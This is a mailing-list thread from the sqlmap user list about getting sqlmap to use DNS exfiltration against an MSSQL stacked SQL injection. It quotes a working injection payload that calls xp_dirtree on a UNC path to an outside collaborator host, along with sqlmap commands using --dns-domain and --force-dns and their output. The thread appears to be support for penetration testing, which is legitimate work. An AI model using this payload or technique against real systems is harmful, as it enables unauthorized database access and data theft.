Re: [sqlmap-users] Sqlmap/DNS exfil
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Sqlmap/DNS exfil
|
From: Miroslav S. <mir...@gm...> - 2016-12-19 23:06:43
|
My last message for today. You've said "However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests" <- you should really focus why stacked SQLi hasn't worked in the first place. After you fix that one, you can try to use dns-exfil to speed the data retrieval of otherwise slow stacked SQLi. Bye On Tue, Dec 20, 2016 at 12:04 AM, Miroslav Stampar < mir...@gm...> wrote: > As said, there should be at least one other SQLi technique available. In > your case there is NONE. sqlmap will not blindly use dns-exfil if at least > one other technique worked. > > Bye > > On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote: > >> Thanks, that's good advice. And I probably should post a little more >> detail on what I'm running here so others can see it as well. >> >> >> Here's the command executing: >> >> >> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p >> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain= >> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os >> "Windows" --threads 1 >> ___ >> __H__ >> ___ ___[.]_____ ___ ___ {1.0.12#stable} >> |_ -| . [)] | .'| . | >> |___|_ [']_|_|_|__,| _| >> |_|V |_| http://sqlmap.org >> >> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior >> mutual consent is illegal. It is the end user's responsibility to obey all >> applicable local, state and federal laws. Developers assume no liability >> and are not responsible for any misuse or damage caused by this program >> >> [*] starting at 16:56:14 >> >> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt' >> [16:56:14] [INFO] setting up DNS server instance >> custom injection marking character ('*') found in option >> '--headers/--user-agent/--referer/--cookie'. Do you want to process it? >> [Y/n/q] n >> [16:56:16] [INFO] testing connection to the target URL >> [16:56:18] [INFO] testing if the target URL is stable >> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page >> comparison on a sequence matcher. If no dynamic nor injectable parameters >> are detected, or in case of junk results, refer to user's manual paragraph >> 'Page comparison' and provide a string or regular expression to match on >> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C >> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter >> 'ProductCategory' might not be injectable >> [16:56:23] [INFO] testing for SQL injection on GET parameter >> 'ProductCategory' >> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE or HAVING clause (IN)' >> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' >> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries >> (comment)' >> [16:56:39] [WARNING] time-based comparison requires larger statistical >> model, please wait......... (done) >> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind >> (IF)' >> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be >> injectable >> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. >> Try to increase '--level'/'--risk' values to perform more tests. Also, you >> can try to rerun by providing either a valid value for option '--string' >> (or '--regexp'). If you suspect that there is some kind of protection >> mechanism involved (e.g. WAF) maybe you could retry with an option >> '--tamper' (e.g. '--tamper=space2comment') >> [16:58:03] [WARNING] HTTP error codes detected during run: >> 500 (Internal Server Error) - 98 times >> >> [*] shutting down at 16:58:03 >> >> >> >> And then, my capture results for DNS traffic: >> >> >> root@bass:~# tcpdump -n -i eth0 udp port 53 >> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode >> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes >> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? >> www.testsite.org. (30) >> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? >> www.testsite.org. (30) >> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A >> 173.213.231.200 (46) >> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117) >> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? >> www.testsite.org. (30) >> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? >> www.testsite.org. (30) >> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A >> 173.213.231.200 (46) >> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117) >> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? >> www.testsite.org. (30) >> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? >> www.testsite.org. (30) >> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A >> 173.213.231.200 (46) >> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117) >> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? >> www.testsite.org. (30) >> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? >> www.testsite.org. (30) >> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A >> 173.213.231.200 (46) >> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117) >> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? >> www.testsite.org. (30) >> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? >> www.testsite.org. (30) >> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A >> 173.213.231.200 (46) >> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117) >> >> >> It doesn't seem like an injection pattern is being tried that is getting >> the DNS exfiltration to occur... or else I'm doing something else wrong. >> >> >> Thanks, >> >> V >> >> ------------------------------ >> *From:* Miroslav Stampar <mir...@gm...> >> *Sent:* Monday, December 19, 2016 4:10 PM >> *To:* Mark M. >> *Cc:* sql...@li... >> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil >> >> I would suggest you to run the wireshark or similar when running the >> --dns-domain to properly debug what is going on. There could be really lots >> of problems before you fine tune it (e.g. other service running on :53). >> >> About the "forcing" sqlmap for using dns-exfil. It will always at least >> try to test it at the start of a run (if other injection technique >> available). Also, it will prefer other "faster" techniques (ERROR and >> UNION) over dns-exfil. However, there is a hidden switch "--force-dns" >> which will force the usage of dns-exfil even if ERROR/UNION are available. >> >> As said, the best advice I can give to you is to run the wireshark during >> the run and really see what is going on. >> >> Bye >> >> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote: >> >>> I have a situation where Burp has detected the following DNS >>> exfiltration injection for a query parameter in a web app: >>> >>> >>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20v >>> archar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9 >>> fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.db >>> o.xp_dirtree%20@q%3b--%20 HTTP/1.1 >>> >>> >>> To make that a little easier to read, the injected value is: >>> >>> >>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp >>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree >>> @q;-- >>> >>> >>> I've modified the domain and verified that I receive the DNS requests on >>> my local DNS server (the domain which I provide to sqlmap using the >>> --dns-domain=xxx option) when the injection is manually sent to the page. >>> The problem is, when I pass the request to sqlmap it's not detecting that >>> there's an injection at all. I've provided the OS/DBMS and --level 5, but >>> still no dice. I'm using sqlmap v1.0.12#stable. >>> >>> >>> Since I've gotten many other injections to work in the past, I believe >>> that I'm using sqlmap properly (formatting my request in a file >>> appropriately, specifying the correct parameter to test, etc.) However, it >>> surprised me that what appeared to be a fairly straight-forward stacked SQL >>> injection would slip by all of sqlmap's tests. Is there a way to force >>> sqlmap to try DNS exfiltration injections despite no other injection >>> technique succeeding? >>> >>> >>> Thanks >>> >>> V >>> >>> >>> >>> >>> ------------------------------------------------------------ >>> ------------------ >>> Developer Access Program for Intel Xeon Phi Processors >>> Access to Intel Xeon Phi processor-based developer platforms. >>> With one year of Intel Parallel Studio XE. >>> Training and support from Colfax. >>> Order your platform today.http://sdm.link/intel >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
